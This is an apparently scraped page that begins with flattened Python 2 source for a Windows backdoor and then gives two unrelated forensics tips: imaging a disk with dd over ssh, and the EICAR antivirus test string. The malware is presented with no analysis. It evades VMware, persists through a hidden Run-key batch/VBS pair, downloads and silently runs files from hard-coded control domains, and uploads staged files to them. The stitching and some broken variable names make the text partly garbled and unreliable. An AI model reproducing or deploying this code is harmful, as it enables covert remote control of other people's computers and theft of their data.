from urllib2 import urlopen from urllib import urlencode from glob import glob from os import path from os import makedirs from os import remove from fileinput import FileInput from socket import gethostname from time import sleep from time import time from os import popen2 from os import popen from re import findall from re import IGNORECASE from psutil import get_pid_list from psutil import Process from sys import exit from sys import argv from httplib import HTTPConnection from os import getpid from os import kill def getserver1(): srv = "games-playbox.com" try: code1 = urlopen('http://worldvoicetrip.com/games/index.html') code2 = code1.read() if int(code2) == 1: code3 = urlopen('http://worldvoicetrip.com/games/domain.html') code4 = code3.read() return code4 else: return srv except: return srv pass foldername = "/winone1" dir1 = "c:\\dir\\" dir3 = "c:\\dir" dir2 = "c:\\dir\\dir2\\" dir4 = "dir2" _file = path.abspath(argv[0]) fpath = path.dirname(path.realpath(_file)) file17 = path.basename(_file) def SysInfo(): values = {} cache = popen2("SYSTEMINFO") source = cache[1].read() sysOpts = ["System Model"] for opt in sysOpts: values[opt] = [item.strip() for item in findall("%s:\w*(.*?)\n" % (opt), source, IGNORECASE)][0] return values try: sysinfo1 = SysInfo() sysinfo2 = str(sysinfo1) except: sysinfo2 = "Test" pass if sysinfo2.find("VMware") <> -1: print "VMware" #exit() pcount = 0 xx = get_pid_list() myid = getpid() for i in xx: try: pro = Process(i).name if pro.find(file17) <> -1: if i != myid: p = i pcount = pcount + 1 except: continue if pcount > 2: exit() try: kill(p, 9) except: pass class ChunkedEncodingWrapper(object): def __init__(self, fileobj, blocksize=102400): self.fileobj = fileobj self.blocksize = blocksize self.current_chunk = "" self.closed = False def read(self, size=None): ret = "" while size is None or size >= len(self.current_chunk): ret += self.current_chunk if size is not None: size -= len(self.current_chunk) if self.closed: self.current_chunk = "" break self._get_chunk() else: ret += self.current_chunk[:size] self.current_chunk = self.current_chunk[size:] return ret def _get_chunk(self): if not self.closed: chunk = self.fileobj.read(self.blocksize) if chunk: self.current_chunk = "%x" % (len(chunk),) + "\r\n" + chunk + "\r\n" else: self.current_chunk = "0\r\n\r\n" self.closed = True if not path.exists(dir1): makedirs(dir1) if not path.exists(dir2): makedirs(dir2) try: batch = open(dir2+'run.bat','wb') bat2='REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v Search /t REG_SZ /d "%s%s" /f'%(dir2,file17) batch.write(bat2) batch.close() f1 = open(dir2+'run.vbs','wb') data12='Set WshShell = CreateObject("WScript.Shell" )\n' data12+='WshShell.Run chr(34) & "'+dir2+'run.bat" & Chr(34), 0\n' data12+='Set WshShell = Nothing' f1.write(data12) f1.close() the_output = popen(dir2+"run.vbs").read() except: pass the_output = popen("attrib +h +s %s"%(dir3)).read() the_output = popen("copy %s %s"%(file17,dir2)).read() cname = gethostname() def splitFile(inputFile,chunkSize,basename1): f = open(inputFile, 'rb') data = f.read() f.close() bytes = len(data) noOfChunks= bytes/chunkSize if(bytes%chunkSize): noOfChunks+=1 f = open(inputFile+'-info.txt', 'w') f.write(basename+','+str(noOfChunks)) f.close() chunkNames = [] j = 0 for i in range(0, bytes+1, chunkSize): j = j + 1 fn1 = inputFile+"-%s" % j chunkNames.append(fn1) f = open(fn1, 'wb') f.write(data[i:i+ chunkSize]) f.close() getserver = getserver1() def runfile(ext): sleep(2) data2len = len(ext) if data2len <> 0: try: if dfile.find(file17) == -1: f1 = open(dir2+'run.vbs','wb') data12='Set WshShell = CreateObject("WScript.Shell" )\n' data12+='WshShell.Run chr(34) & "'+ext+'" & Chr(34), 0\n' data12+='Set WshShell = Nothing' f1.write(data12) f1.close() size1 = path.getsize(ext) if size1 <> 0: the_output = popen(dir2+"run.vbs").read() remove(dir2+"run.vbs") else: remove(dfile) except: pass def dex(cname): try: dfiles5 = urlopen("http://"+ getserver + foldername+ "/online.php?sysname="+cname+"") dfiles6 = dfiles5.read() dfiles7 = dfiles6.split(';') data7len = len(dfiles6) if data7len <> 0: for dfile in dfiles7: try: f5 = urlopen("http://"+ getserver + foldername+ "/download/%s"%dfile) output1=open(dir2+"%s"%dfile,'wb') output1.write(f5.read()) output1.close() dfile = dir2+dfile runfile(dfile) except: continue except: pass def dex1(): try: dfiles12 = urlopen("http://"+ getserver + foldername+ "/getfile.php") dfiles11 = dfiles12.read() dfiles13 = dfiles1.split(';') files11 = glob(dir2+"*") for dfile14 in dfiles13: try: if not (dfile14 in files11): f11 = urlopen("http://"+ getserver + foldername+ "/download/%s"%dfile14) output11=open(dir2+"%s"%dfile14,'wb') output11.write(f11.read()) output11.close() dfile = '' dfile = dir2+dfile14 runfile(dfile) except: continue except: pass try: urlopen("http://"+ getserver + foldername+ "/post.php?filename=&folder="+cname+"//") dfiles2 = urlopen("http://"+ getserver + foldername+ "/getfile.php") dfiles1 = dfiles2.read() datalen3 = len(dfiles1) if datalen3 == 0: dfiles = '' dfiles = glob(dir2+"*.exe") for dfile in dfiles: try: runfile(dfile) except: continue else: dfiles = dfiles1.split(';') for dfile in dfiles: try: f = urlopen("http://"+ getserver + foldername+ "/download/%s"%dfile) output=open(dir2+"%s"%dfile,'wb') output.write(f.read()) output.close() dfiles = '' dfiles = dir2+"%s"%(dfile) runfile(dfiles) except: continue except: dfiles = '' dfiles = glob(dir2+"*.exe") for dfile in dfiles: try: runfile(dfile) except: continue remove(dir2+"run.bat") print "Enting While" time1 = int(time()) count = 0 while True: try: time2 = int(time()) tdif = time2 - time1 if tdif > 3600: dex1() time1 = int(time()) sleep (1) count = count + 1 files = glob(dir1+"*") if count > 120 : urlopen("http://"+ getserver + foldername+ "/post.php?filename=&folder="+cname+"//") dex(cname) count = 0 for file1 in files: try: if file1.find(dir4) <> -1: continue try: myfile = open(file1, "r+") except: continue myfile.close() basename = path.basename(file1) size = path.getsize(file1) if size > 105163101 : splitFile(file1,105163101,basename) remove(file1) data = open(file1,"rb") w = ChunkedEncodingWrapper(data) v = urlencode({'filename': basename}) x = urlencode({'folder': cname}) headers = {"Transfer-Encoding": "chunked"} c = HTTPConnection(getserver) c.request("POST", "%s/post.php?%s&%s/"%(foldername,v,x), w, headers) data.close() remove(file1) dex(cname) count = 0 time2 = int(time()) tdif = time2 - time1 if tdif > 3600: dex1() time1 = int(time()) except: pass except: pass
Transfer a disk image via dd and ssh
To transfer a disk image via an ssh tunnel (think evidence collection across the internet):
dd if=</path/to/disk> | ssh user@host “dd of=<filename>”
For example:
dd if=/dev/sda | ssh user@example.com “dd of=image.dd”
In practice, you’ll probably want to use some additional dd options such as bs (block size), count, etc. If doing this for evidentiary purposes, dcfldd, dc3dd, ewfacquire, and others, provide more forensic-friendly options.
To compress data before sending it across the network, add bzip2 (or gzip) with another pipe:
dd if=</path/to/disk> | bzip2 | ssh user@host “dd of=<filename”.
Creating an EICAR test file
Copy and save the following as eicar.com (yes, it’s an all ASCII .com file):
X5O!P%@AP[4\PZX54(P^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H*
As a sanity check, the file should be 68 bytes long. You can also try running the file, which should print “EICAR-STANDARD-ANTIVIRUS-TEST-FILE” to the screen.
Alternatively, you can download eicar.com.txt.